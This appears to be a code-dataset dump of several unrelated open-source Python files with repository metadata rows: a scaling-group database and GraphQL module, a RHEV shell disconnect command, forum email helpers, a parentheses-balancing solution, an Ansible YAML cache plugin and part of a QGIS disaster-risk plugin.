sa.Column('scheduler', sa.String(length=64), nullable=False),
sa.Column('scheduler_opts', pgsql.JSONB(), nullable=False, default={}),
)
# When scheduling, we take the union of allowed scaling groups for
# each domain, group, and keypair.
sgroups_for_domains = sa.Table(
'sgroups_for_domains', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('domain',
sa.ForeignKey('domains.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'domain', name='uq_sgroup_domain'),
)
sgroups_for_groups = sa.Table(
'sgroups_for_groups', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('group',
sa.ForeignKey('groups.id',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'group', name='uq_sgroup_ugroup'),
)
sgroups_for_keypairs = sa.Table(
'sgroups_for_keypairs', metadata,
sa.Column('scaling_group',
sa.ForeignKey('scaling_groups.name',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.Column('access_key',
sa.ForeignKey('keypairs.access_key',
onupdate='CASCADE',
ondelete='CASCADE'),
index=True, nullable=False),
sa.UniqueConstraint('scaling_group', 'access_key', name='uq_sgroup_akey'),
)
async def query_allowed_sgroups(
db_conn: SAConnection,
domain_name: str,
group: Union[uuid.UUID, str],
access_key: str,
) -> Sequence[Row]:
query = (
sa.select([sgroups_for_domains])
.where(sgroups_for_domains.c.domain == domain_name)
)
result = await db_conn.execute(query)
from_domain = {row['scaling_group'] for row in result}
group_id = await resolve_group_name_or_id(db_conn, domain_name, group)
from_group: Set[str]
if group_id is None:
from_group = set() # empty
else:
query = (
sa.select([sgroups_for_groups])
.where(
(sgroups_for_groups.c.group == group_id)
)
)
result = await db_conn.execute(query)
from_group = {row['scaling_group'] for row in result}
query = (sa.select([sgroups_for_keypairs])
.where(sgroups_for_keypairs.c.access_key == access_key))
result = await db_conn.execute(query)
from_keypair = {row['scaling_group'] for row in result}
sgroups = from_domain | from_group | from_keypair
query = (sa.select([scaling_groups])
.where(
(scaling_groups.c.name.in_(sgroups)) &
(scaling_groups.c.is_active)
))
result = await db_conn.execute(query)
return [row for row in result]
class ScalingGroup(graphene.ObjectType):
name = graphene.String()
description = graphene.String()
is_active = graphene.Boolean()
created_at = GQLDateTime()
driver = graphene.String()
driver_opts = graphene.JSONString()
scheduler = graphene.String()
scheduler_opts = graphene.JSONString()
@classmethod
def from_row(
cls,
ctx: GraphQueryContext,
row: Row | None,
) -> ScalingGroup | None:
if row is None:
return None
return cls(
name=row['name'],
description=row['description'],
is_active=row['is_active'],
created_at=row['created_at'],
driver=row['driver'],
driver_opts=row['driver_opts'],
scheduler=row['scheduler'],
scheduler_opts=row['scheduler_opts'],
)
@classmethod
async def load_all(
cls,
ctx: GraphQueryContext,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
query = sa.select([scaling_groups]).select_from(scaling_groups)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_domain(
cls,
ctx: GraphQueryContext,
domain: str,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_domains,
scaling_groups.c.name == sgroups_for_domains.c.scaling_group)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_domains.c.domain == domain)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_group(
cls,
ctx: GraphQueryContext,
group: uuid.UUID,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_groups,
scaling_groups.c.name == sgroups_for_groups.c.scaling_group
)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_groups.c.group == group)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def load_by_keypair(
cls,
ctx: GraphQueryContext,
access_key: str,
*,
is_active: bool = None,
) -> Sequence[ScalingGroup]:
j = sa.join(
scaling_groups, sgroups_for_keypairs,
scaling_groups.c.name == sgroups_for_keypairs.c.scaling_group)
query = (
sa.select([scaling_groups])
.select_from(j)
.where(sgroups_for_keypairs.c.access_key == access_key)
)
if is_active is not None:
query = query.where(scaling_groups.c.is_active == is_active)
async with ctx.db.begin_readonly() as conn:
return [
obj async for row in (await conn.stream(query))
if (obj := cls.from_row(ctx, row)) is not None
]
@classmethod
async def batch_load_by_name(
cls,
ctx: GraphQueryContext,
names: Sequence[str],
) -> Sequence[ScalingGroup | None]:
query = (
sa.select([scaling_groups])
.select_from(scaling_groups)
.where(scaling_groups.c.name.in_(names))
)
async with ctx.db.begin_readonly() as conn:
return await batch_result(
ctx, conn, query, cls,
names, lambda row: row['name'],
)
class CreateScalingGroupInput(graphene.InputObjectType):
description = graphene.String(required=False, default='')
is_active = graphene.Boolean(required=False, default=True)
driver = graphene.String(required=True)
driver_opts = graphene.JSONString(required=False, default={})
scheduler = graphene.String(required=True)
scheduler_opts = graphene.JSONString(required=False, default={})
class ModifyScalingGroupInput(graphene.InputObjectType):
description = graphene.String(required=False)
is_active = graphene.Boolean(required=False)
driver = graphene.String(required=False)
driver_opts = graphene.JSONString(required=False)
scheduler = graphene.String(required=False)
scheduler_opts = graphene.JSONString(required=False)
class CreateScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
props = CreateScalingGroupInput(required=True)
ok = graphene.Boolean()
msg = graphene.String()
scaling_group = graphene.Field(lambda: ScalingGroup, required=False)
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
props: CreateScalingGroupInput,
) -> CreateScalingGroup:
data = {
'name': name,
'description': props.description,
'is_active': bool(props.is_active),
'driver': props.driver,
'driver_opts': props.driver_opts,
'scheduler': props.scheduler,
'scheduler_opts': props.scheduler_opts,
}
insert_query = (
sa.insert(scaling_groups).values(data)
)
return await simple_db_mutate_returning_item(
cls, info.context, insert_query, item_cls=ScalingGroup
)
class ModifyScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
props = ModifyScalingGroupInput(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
props: ModifyScalingGroupInput,
) -> ModifyScalingGroup:
data: Dict[str, Any] = {}
set_if_set(props, data, 'description')
set_if_set(props, data, 'is_active')
set_if_set(props, data, 'driver')
set_if_set(props, data, 'driver_opts')
set_if_set(props, data, 'scheduler')
set_if_set(props, data, 'scheduler_opts')
update_query = (
sa.update(scaling_groups)
.values(data)
.where(scaling_groups.c.name == name)
)
return await simple_db_mutate(cls, info.context, update_query)
class DeleteScalingGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
name = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
name: str,
) -> DeleteScalingGroup:
delete_query = (
sa.delete(scaling_groups)
.where(scaling_groups.c.name == name)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
domain: str,
) -> AssociateScalingGroupWithDomain:
insert_query = (
sa.insert(sgroups_for_domains)
.values({
'scaling_group': scaling_group,
'domain': domain,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
domain: str,
) -> DisassociateScalingGroupWithDomain:
delete_query = (
sa.delete(sgroups_for_domains)
.where(
(sgroups_for_domains.c.scaling_group == scaling_group) &
(sgroups_for_domains.c.domain == domain)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
class DisassociateAllScalingGroupsWithDomain(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
domain = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
domain: str,
) -> DisassociateAllScalingGroupsWithDomain:
delete_query = (
sa.delete(sgroups_for_domains)
.where(sgroups_for_domains.c.domain == domain)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithUserGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
user_group: uuid.UUID,
) -> AssociateScalingGroupWithUserGroup:
insert_query = (
sa.insert(sgroups_for_groups)
.values({
'scaling_group': scaling_group,
'group': user_group,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithUserGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
user_group: uuid.UUID,
) -> DisassociateScalingGroupWithUserGroup:
delete_query = (
sa.delete(sgroups_for_groups)
.where(
(sgroups_for_groups.c.scaling_group == scaling_group) &
(sgroups_for_groups.c.group == user_group)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
class DisassociateAllScalingGroupsWithGroup(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
user_group = graphene.UUID(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
user_group: uuid.UUID,
) -> DisassociateAllScalingGroupsWithGroup:
delete_query = (
sa.delete(sgroups_for_groups)
.where(sgroups_for_groups.c.group == user_group)
)
return await simple_db_mutate(cls, info.context, delete_query)
class AssociateScalingGroupWithKeyPair(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
access_key = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
access_key: str,
) -> AssociateScalingGroupWithKeyPair:
insert_query = (
sa.insert(sgroups_for_keypairs)
.values({
'scaling_group': scaling_group,
'access_key': access_key,
})
)
return await simple_db_mutate(cls, info.context, insert_query)
class DisassociateScalingGroupWithKeyPair(graphene.Mutation):
allowed_roles = (UserRole.SUPERADMIN,)
class Arguments:
scaling_group = graphene.String(required=True)
access_key = graphene.String(required=True)
ok = graphene.Boolean()
msg = graphene.String()
@classmethod
async def mutate(
cls,
root,
info: graphene.ResolveInfo,
scaling_group: str,
access_key: str,
) -> DisassociateScalingGroupWithKeyPair:
delete_query = (
sa.delete(sgroups_for_keypairs)
.where(
(sgroups_for_keypairs.c.scaling_group == scaling_group) &
(sgroups_for_keypairs.c.access_key == access_key)
)
)
return await simple_db_mutate(cls, info.context, delete_query)
| lgpl-3.0 | 5,024,193,378,153,518,000 | 28.849206 | 78 | 0.591811 | false | 3.916077 | false | false | false |
geertj/rhevsh | lib/rhevsh/command/disconnect.py | 2 | 1221 | #
# This file is part of python-rhev. python-rhev is free software that is
# made available under the MIT license. Consult the file "LICENSE" that
# is distributed together with this file for the exact licensing terms.
#
# python-rhev is copyright (c) 2010-2011 by the python-rhev authors. See
# the file "AUTHORS" for a complete overview.
from rhev import Connection, Error as RhevError
from rhevsh.command.command import RhevCommand
class DisconnectCommand(RhevCommand):
name = 'disconnect'
description = 'disconnect from RHEV manager'
helptext = """\
== Usage ==
disconnect
== Description ==
Disconnect an active connection to RHEV manager, if any. This method
can be called multiple times. It is not an error to disconnect when
not connected.
"""
def execute(self):
stdout = self.context.terminal.stdout
connection = self.context.connection
if connection is None:
stdout.write('not connected\n')
return
try:
connection.close()
except RhevError, e:
pass
stdout.write('disconnected from RHEV manager\n')
self.context.connection = None
| mit | -6,982,907,321,741,989,000 | 29.525 | 76 | 0.659296 | false | 4.329787 | false | false | false |
nitely/Spirit | spirit/user/utils/email.py | 1 | 1304 | # -*- coding: utf-8 -*-
from django.utils.translation import gettext as _
from django.template.loader import render_to_string
from djconfig import config
from spirit.core.utils import site_url
from spirit.core import tasks
from .tokens import (
UserActivationTokenGenerator,
UserEmailChangeTokenGenerator)
# XXX remove; use tasks for everything
def sender(request, subject, template_name, context, to):
context['site'] = site_url()
context['site_name'] = config.site_name
message = render_to_string(template_name, context)
# Subject cannot contain new lines
subject = ''.join(subject.splitlines())
tasks.send_email(subject, message, to)
def send_activation_email(request, user):
subject = _("User activation")
template_name = 'spirit/user/activation_email.html'
token = UserActivationTokenGenerator().generate(user)
context = {'user_id': user.pk, 'token': token}
sender(request, subject, template_name, context, [user.email, ])
def send_email_change_email(request, user, new_email):
subject = _("Email change")
template_name = 'spirit/user/email_change_email.html'
token = UserEmailChangeTokenGenerator().generate(user, new_email)
context = {'token': token}
sender(request, subject, template_name, context, [user.email, ])
| mit | 9,153,052,069,552,357,000 | 33.315789 | 69 | 0.716258 | false | 3.725714 | false | false | false |
l33tdaima/l33tdaima | pr1249m/min_remove_to_make_valid.py | 1 | 1249 | class Solution:
def minRemoveToMakeValidV1(self, s: str) -> str:
matched, stack = set(), list()
for i, c in enumerate(s):
if c == "(":
stack.append(i)
elif c == ")" and len(stack) > 0:
matched.add(stack.pop())
matched.add(i)
return "".join([c for i, c in enumerate(s) if c not in "()" or i in matched])
def minRemoveToMakeValidV2(self, s: str) -> str:
removed, stack = set(), list()
for i, c in enumerate(s):
if c == "(":
stack.append(i)
elif c == ")":
if len(stack) > 0:
stack.pop()
else:
removed.add(i)
removed |= set(stack)
return "".join(
[c for i, c in enumerate(s) if c not in "()" or i not in removed]
)
# TESTS
for s, expected in [
("lee(t(c)o)de)", "lee(t(c)o)de"),
("a)b(c)d", "ab(c)d"),
("))((", ""),
("(a(b(c)d)", "a(b(c)d)"),
]:
sol = Solution()
actual = sol.minRemoveToMakeValidV1(s)
print(f"Minimum Remove to Make '{s}' Valid Parentheses -> {actual}")
assert actual == expected
assert expected == sol.minRemoveToMakeValidV2(s)
| mit | 1,408,042,470,552,632,300 | 31.025641 | 85 | 0.470777 | false | 3.375676 | false | false | false |
mheap/ansible | lib/ansible/plugins/cache/yaml.py | 15 | 1924 | # (c) 2017, Brian Coca
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
cache: yaml
short_description: YAML formatted files.
description:
- This cache uses YAML formatted, per host, files saved to the filesystem.
version_added: "2.3"
author: Brian Coca (@bcoca)
options:
_uri:
required: True
description:
- Path in which the cache plugin will save the files
type: list
env:
- name: ANSIBLE_CACHE_PLUGIN_CONNECTION
ini:
- key: fact_caching_connection
section: defaults
_prefix:
description: User defined prefix to use when creating the files
env:
- name: ANSIBLE_CACHE_PLUGIN_PREFIX
ini:
- key: fact_caching_prefix
section: defaults
_timeout:
default: 86400
description: Expiration timeout for the cache plugin data
env:
- name: ANSIBLE_CACHE_PLUGIN_TIMEOUT
ini:
- key: fact_caching_timeout
section: defaults
type: integer
'''
import codecs
import yaml
from ansible.parsing.yaml.loader import AnsibleLoader
from ansible.parsing.yaml.dumper import AnsibleDumper
from ansible.plugins.cache import BaseFileCacheModule
class CacheModule(BaseFileCacheModule):
"""
A caching module backed by yaml files.
"""
def _load(self, filepath):
with codecs.open(filepath, 'r', encoding='utf-8') as f:
return AnsibleLoader(f).get_single_data()
def _dump(self, value, filepath):
with codecs.open(filepath, 'w', encoding='utf-8') as f:
yaml.dump(value, f, Dumper=AnsibleDumper, default_flow_style=False)
| gpl-3.0 | 4,063,753,266,278,565,000 | 28.151515 | 92 | 0.634615 | false | 4.016701 | false | false | false |
b3ngmann/python-pastime | ps5/ps5_recursion.py | 1 | 2868 | # 6.00x Problem Set 5
#
# Part 2 - RECURSION
#
# Problem 3: Recursive String Reversal
#
def reverseString(aStr):
"""
Given a string, recursively returns a reversed copy of the string.
For example, if the string is 'abc', the function returns 'cba'.
The only string operations you are allowed to use are indexing,
slicing, and concatenation.
aStr: a string
returns: a reversed string
"""
if len(aStr) == 0 or len(aStr) == 1:
return aStr
else:
return aStr[-1] + reverseString(aStr[:-1])
print reverseString('abc')
#
# Problem 4: X-ian
#
def x_ian(x, word):
"""
Given a string x, returns True if all the letters in x are
contained in word in the same order as they appear in x.
>>> x_ian('eric', 'meritocracy')
True
>>> x_ian('eric', 'cerium')
False
>>> x_ian('john', 'mahjong')
False
x: a string
word: a string
returns: True if word is x_ian, False otherwise
"""
if len(x) == 0:
return True
elif len(x) == 1:
return x in word
elif x[0] in word:
return x_ian(x[1:], word[word.find(x[0])+1:])
else:
return False
print x_ian('eric', 'meritocracy')
print x_ian('eric', 'cerium')
print x_ian('sarina', 'czarina')
print x_ian('alvin', 'palavering')
print x_ian('john', 'mahjong')
print x_ian('eric', 'algebraic')
#
# Problem 5: Typewriter
#
def insertNewlines(text, lineLength):
"""
Given text and a desired line length, wrap the text as a typewriter would.
Insert a newline character ("\n") after each word that reaches or exceeds
the desired line length.
text: a string containing the text to wrap.
line_length: the number of characters to include on a line before wrapping
the next word.
returns: a string, with newline characters inserted appropriately.
"""
#words = text.split()
if len(text) < lineLength:
return text
else:
if text[lineLength] == ' ':
return text[:lineLength + 1] + '\n' + insertNewlines(text[lineLength + 1:].lstrip(), lineLength)
else:
if text.find(' ', lineLength - 1) != -1:
return text[:text.find(' ', lineLength - 1)] + '\n' + insertNewlines(text[text.find(' ', lineLength-1):].lstrip(), lineLength)
else:
return text[:] #+ '\n' + insertNewlines(text[:].lstrip(), lineLength)
print insertNewlines('Random text to wrap again.', 5)
print
print insertNewlines('While I expect new intellectual adventures ahead, nothing will compare to the exhilaration of the world-changing accomplishments that we produced together.', 15)
print
print insertNewlines('Nuh-uh! We let users vote on comments and display them by number of votes. Everyone knows that makes it impossible for a few persistent voices to dominate the discussion.', 20) | mit | -5,427,299,215,341,551,000 | 31.602273 | 198 | 0.636681 | false | 3.57606 | false | false | false |
gijs/inasafe | safe_qgis/plugin.py | 1 | 19440 | """
InaSAFE Disaster risk assessment tool developed by AusAid -
**QGIS plugin implementation.**
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from safe.impact_functions.earthquake.earthquake_building_impact import LOGGER
__author__ = '[email protected]'
__revision__ = '$Format:%H$'
__date__ = '10/01/2011'
__copyright__ = 'Copyright 2012, Australia Indonesia Facility for '
__copyright__ += 'Disaster Reduction'
import os
# Import the PyQt and QGIS libraries
from PyQt4.QtCore import (QObject,
QLocale,
QTranslator,
SIGNAL,
QCoreApplication,
Qt,
QSettings,
QVariant)
from PyQt4.QtGui import QAction, QIcon, QApplication, QMessageBox
try:
# When upgrading, using the plugin manager, you may get an error when
# doing the following import, so we wrap it in a try except
# block and then display a friendly message to restart QGIS
from safe_qgis.exceptions import TranslationLoadError
except ImportError:
# Note these strings cant be translated.
QMessageBox.warning(None, 'InaSAFE',
'Please restart QGIS to use this plugin.')
import utilities
class Plugin:
"""The QGIS interface implementation for the Risk in a box plugin.
This class acts as the 'glue' between QGIS and our custom logic.
It creates a toolbar and menubar entry and launches the InaSAFE user
interface if these are activated.
"""
def __init__(self, iface):
"""Class constructor.
On instantiation, the plugin instance will be assigned a copy
of the QGIS iface object which will allow this plugin to access and
manipulate the running QGIS instance that spawned it.
Args:
iface - a Quantum GIS QGisAppInterface instance. This instance
is automatically passed to the plugin by QGIS when it loads the
plugin.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Save reference to the QGIS interface
self.iface = iface
self.translator = None
self.setupI18n()
#print self.tr('InaSAFE')
utilities.setupLogger()
#noinspection PyArgumentList
def setupI18n(self, thePreferredLocale=None):
"""Setup internationalisation for the plugin.
See if QGIS wants to override the system locale
and then see if we can get a valid translation file
for whatever locale is effectively being used.
Args:
thePreferredLocale - optional parameter which if set
will override any other way of determining locale..
Returns:
None.
Raises:
TranslationLoadException
"""
myOverrideFlag = QSettings().value('locale/overrideFlag',
QVariant(False)).toBool()
if thePreferredLocale is not None:
myLocaleName = thePreferredLocale
elif myOverrideFlag:
myLocaleName = QSettings().value('locale/userLocale',
QVariant('')).toString()
else:
myLocaleName = QLocale.system().name()
# NOTES: we split the locale name because we need the first two
# character i.e. 'id', 'af, etc
myLocaleName = str(myLocaleName).split('_')[0]
# Also set the system locale to the user overridden local
# so that the inasafe library functions gettext will work
# .. see:: :py:func:`common.utilities`
os.environ['LANG'] = str(myLocaleName)
LOGGER.debug('%s %s %s %s' % (thePreferredLocale , myOverrideFlag,
QLocale.system().name(),
os.environ['LANG']))
myRoot = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
myTranslationPath = os.path.join(myRoot, 'safe_qgis', 'i18n',
'inasafe_' + str(myLocaleName) + '.qm')
if os.path.exists(myTranslationPath):
self.translator = QTranslator()
myResult = self.translator.load(myTranslationPath)
if not myResult:
myMessage = 'Failed to load translation for %s' % myLocaleName
raise TranslationLoadError(myMessage)
QCoreApplication.installTranslator(self.translator)
LOGGER.debug('%s %s' % (myTranslationPath,
os.path.exists(myTranslationPath)))
def tr(self, theString):
"""We implement this ourself since we do not inherit QObject.
Args:
theString - string for translation.
Returns:
Translated version of theString.
Raises:
no exceptions explicitly raised.
"""
return QCoreApplication.translate('Plugin', theString)
#noinspection PyCallByClass
def initGui(self):
"""Gui initialisation procedure (for QGIS plugin api).
This method is called by QGIS and should be used to set up
any graphical user interface elements that should appear in QGIS by
default (i.e. before the user performs any explicit action with the
plugin).
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Import dock here as it needs to be imported AFTER i18n is set up
from safe_qgis.dock import Dock
self.dockWidget = None
#--------------------------------------
# Create action for plugin dockable window (show/hide)
#--------------------------------------
# pylint: disable=W0201
self.actionDock = QAction(QIcon(':/plugins/inasafe/icon.png'),
self.tr('Toggle InaSAFE Dock'), self.iface.mainWindow())
self.actionDock.setObjectName('InaSAFEDockToggle')
self.actionDock.setStatusTip(self.tr(
'Show/hide InaSAFE dock widget'))
self.actionDock.setWhatsThis(self.tr(
'Show/hide InaSAFE dock widget'))
self.actionDock.setCheckable(True)
self.actionDock.setChecked(True)
QObject.connect(self.actionDock, SIGNAL('triggered()'),
self.showHideDockWidget)
# add to plugin toolbar
self.iface.addToolBarIcon(self.actionDock)
# add to plugin menu
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionDock)
#--------------------------------------
# Create action for keywords editor
#--------------------------------------
self.actionKeywordsDialog = QAction(
QIcon(':/plugins/inasafe/keywords.png'),
self.tr('InaSAFE Keyword Editor'),
self.iface.mainWindow())
self.actionKeywordsDialog.setStatusTip(self.tr(
'Open InaSAFE keywords editor'))
self.actionKeywordsDialog.setWhatsThis(self.tr(
'Open InaSAFE keywords editor'))
self.actionKeywordsDialog.setEnabled(False)
QObject.connect(self.actionKeywordsDialog, SIGNAL('triggered()'),
self.showKeywordsEditor)
self.iface.addToolBarIcon(self.actionKeywordsDialog)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionKeywordsDialog)
#--------------------------------------
# Create action for reset icon
#--------------------------------------
self.actionResetDock = QAction(
QIcon(':/plugins/inasafe/reload.png'),
self.tr('Reset Dock'), self.iface.mainWindow())
self.actionResetDock.setStatusTip(self.tr(
'Reset the InaSAFE Dock'))
self.actionResetDock.setWhatsThis(self.tr(
'Reset the InaSAFE Dock'))
QObject.connect(self.actionResetDock, SIGNAL('triggered()'),
self.resetDock)
self.iface.addToolBarIcon(self.actionResetDock)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionResetDock)
#--------------------------------------
# Create action for options dialog
#--------------------------------------
self.actionOptions = QAction(
QIcon(':/plugins/inasafe/options.png'),
self.tr('InaSAFE Options'), self.iface.mainWindow())
self.actionOptions.setStatusTip(self.tr(
'Open InaSAFE options dialog'))
self.actionOptions.setWhatsThis(self.tr(
'Open InaSAFE options dialog'))
QObject.connect(self.actionOptions, SIGNAL('triggered()'),
self.showOptions)
self.iface.addToolBarIcon(self.actionOptions)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionOptions)
#--------------------------------------
# Create action for impact functions doc dialog
#--------------------------------------
self.actionImpactFunctionsDoc = QAction(
QIcon(':/plugins/inasafe/functions-table.png'),
self.tr('InaSAFE Impact Functions Browser'),
self.iface.mainWindow())
self.actionImpactFunctionsDoc.setStatusTip(self.tr(
'Open InaSAFE Impact Functions Browser'))
self.actionImpactFunctionsDoc.setWhatsThis(self.tr(
'Open InaSAFE Impact Functions Browser'))
QObject.connect(self.actionImpactFunctionsDoc, SIGNAL('triggered()'),
self.showImpactFunctionsDoc)
self.iface.addToolBarIcon(self.actionImpactFunctionsDoc)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionImpactFunctionsDoc)
# Short cut for Open Impact Functions Doc
self.keyAction = QAction("Test Plugin", self.iface.mainWindow())
self.iface.registerMainWindowAction(self.keyAction, "F7")
QObject.connect(self.keyAction, SIGNAL("triggered()"),
self.keyActionF7)
#---------------------------------------
# Create action for minimum needs dialog
#---------------------------------------
self.actionMinimumNeeds = QAction(
QIcon(':/plugins/inasafe/minimum_needs.png'),
self.tr('InaSAFE Minimum Needs Tool'), self.iface.mainWindow())
self.actionMinimumNeeds.setStatusTip(self.tr(
'Open InaSAFE minimum needs tool'))
self.actionMinimumNeeds.setWhatsThis(self.tr(
'Open InaSAFE minimum needs tool'))
QObject.connect(self.actionMinimumNeeds, SIGNAL('triggered()'),
self.showMinimumNeeds)
self.iface.addToolBarIcon(self.actionMinimumNeeds)
self.iface.addPluginToMenu(self.tr('InaSAFE'),
self.actionMinimumNeeds)
#--------------------------------------
# create dockwidget and tabify it with the legend
#--------------------------------------
self.dockWidget = Dock(self.iface)
self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockWidget)
myLegendTab = self.iface.mainWindow().findChild(QApplication, 'Legend')
if myLegendTab:
self.iface.mainWindow().tabifyDockWidget(
myLegendTab, self.dockWidget)
self.dockWidget.raise_()
#
# Hook up a slot for when the current layer is changed
#
QObject.connect(self.iface,
SIGNAL("currentLayerChanged(QgsMapLayer*)"),
self.layerChanged)
#
# Hook up a slot for when the dock is hidden using its close button
# or view-panels
#
QObject.connect(self.dockWidget,
SIGNAL("visibilityChanged (bool)"),
self.toggleActionDock)
# pylint: disable=W0201
def unload(self):
"""Gui breakdown procedure (for QGIS plugin api).
This method is called by QGIS and should be used to *remove*
any graphical user interface elements that should appear in QGIS.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
# Remove the plugin menu item and icon
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionDock)
self.iface.removeToolBarIcon(self.actionDock)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionKeywordsDialog)
self.iface.removeToolBarIcon(self.actionKeywordsDialog)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionResetDock)
self.iface.removeToolBarIcon(self.actionResetDock)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionOptions)
self.iface.removeToolBarIcon(self.actionOptions)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionMinimumNeeds)
self.iface.removeToolBarIcon(self.actionMinimumNeeds)
self.iface.removePluginMenu(self.tr('InaSAFE'),
self.actionImpactFunctionsDoc)
self.iface.removeToolBarIcon(self.actionImpactFunctionsDoc)
self.iface.mainWindow().removeDockWidget(self.dockWidget)
self.dockWidget.setVisible(False)
self.dockWidget.destroy()
QObject.disconnect(self.iface,
SIGNAL("currentLayerChanged(QgsMapLayer*)"),
self.layerChanged)
def toggleActionDock(self, checked):
"""check or uncheck the toggle inaSAFE toolbar button.
This slot is called when the user hides the inaSAFE panel using its
close button or using view->panels
.. see also:: :func:`Plugin.initGui`.
Args:
checked - if actionDock has to be checked or not
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
self.actionDock.setChecked(checked)
# Run method that performs all the real work
def showHideDockWidget(self):
"""Show or hide the dock widget.
This slot is called when the user clicks the toolbar icon or
menu item associated with this plugin. It will hide or show
the dock depending on its current state.
.. see also:: :func:`Plugin.initGui`.
Args:
None.
Returns:
None.
Raises:
no exceptions explicitly raised.
"""
if self.dockWidget.isVisible():
self.dockWidget.setVisible(False)
else:
self.dockWidget.setVisible(True)
self.dockWidget.raise_()
def showMinimumNeeds(self):
"""Show the minimum needs dialog.
